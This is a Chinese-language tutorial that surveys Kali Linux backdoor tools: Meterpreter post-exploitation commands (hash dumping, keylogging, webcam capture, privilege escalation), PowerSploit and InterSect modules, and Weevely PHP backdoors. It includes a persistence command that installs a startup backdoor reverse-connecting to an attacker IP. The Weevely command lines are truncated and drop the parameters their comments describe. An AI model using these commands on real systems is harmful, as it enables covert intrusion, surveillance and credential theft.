Kali Linux之常見后門工具介紹
1、Meterpreter
它是Metasploit框架中功能強大的后滲透模塊。可以通過Meterpreter的客戶端執行攻擊腳本,遠程調用目標主機上運行的Meterpreter服務端。
命令 作用
sessions 查看會話ID信息
idletime 顯示目標主機截止當前無操作命令的時間
webcam_snap 抓取目標主機的攝像頭,將拍攝的內容保存到本地
run checkvm 檢查目標主機是否是虛擬機
rdesktop 執行rdesktop -u username -p password ip 執行命令之后就會彈出一個窗口對目標進行控制
hashdump 獲得密碼的hash值
keylogrecorder 記錄鍵盤信息
vnc 打開遠程目標桌面
getsystem 目標系統權限提升
Meterpreter相當于攻擊成功后駐留在內存中的Shellcode,為了保持長久的控制,metasplpoit提供了persistence和metsvc,模塊,用于在目標為windows系統上安裝開機運行或永久服務等后門。命令如下:
meterpreter>run persistence -X -i 5 -p 2000 -r 192.168.1.101 #在注冊表中寫入開機啟動項,反向連接192.168.1.101:2000(攻擊者的ip和端口) -X表示開機啟動 ,-i表示反向連接間隔
meterpreter>run metsvc #安裝系統服務metsvc
2、PowerSpoit
基于PowerShell的后門集成框架。需要.Net環境支持。其主要模塊:
1、CodeExecution 在目標主機執行代碼
2、ScriptModification 在目標主機上創建或修改腳本
3、Persistence 設置后門,開機啟動或安裝服務等
4、AntivirusBypass 繞過殺毒軟件
5、Exfiltration 在目標主機上進行信息搜集的工具
6、Mayhem 藍屏等破壞性腳本
7、Recon 以目標主機為跳板進行內網偵查
3、InterSect
是一個后滲透完成多種后期任務的Python程序。它能夠自動收集密碼文件和網絡信息,并且能夠識別殺毒軟件和防火墻程序。若需要使用它自動執行后期任務,需要創建自己的腳本文件,并在腳本中指定所需的各種功能,InterSect為每種功能提供對應的模塊,其包含的功能模塊:
1、creds 收集認證信息
2、extras 搜索操作系統和應用程序的配置文件,以檢索特定的應用程序和防護程序
3、network 收集網絡信息,例如服務端口和dns信息
4、lanmap 枚舉在線主機并收集ip地址
5、osuser 枚舉操作系統信息
6、openshares 在特定的主機上查找smb的公開共享
7、portscan 簡易的端口掃描程序,可以掃描特定ip的1~1000端口
8、egressbuster 在指定的端口范圍內,搜索可用的外聯端口
9、privsec 檢測Linux內核的系統是否存在可提權漏洞
10、xmlcrack 將哈希列表發送端遠程XMLRPC,以繼續破解
11、reversexor 采用異或加密的reverse shell
12、bshell 基于tcp協議的bind shell
13、rshell 基于tcp協議的reverse shell
14、xorshell 基于xor加密的bind shell
15、aeshttp 采用aes算法加密的HTTP reverse shell
16、udpbind 采用udp協議的bind shell,默認端口為 21541
17、persistent 會在系統啟動時自動運行的持久型后門
4、Weevely
是一款功能強大的PHP后門工具,它使用HTTP協議包頭部進行指令傳輸。它的使用非常簡單,但僅支持php語言。
建立后門:weevely generate #password為自己設置的后門連接密碼,path為存放生成的木馬文件路徑
連接后門:weevely [cmd] #URL為后門地址,password為后門密碼,cmd為可選項,表示要執行的命令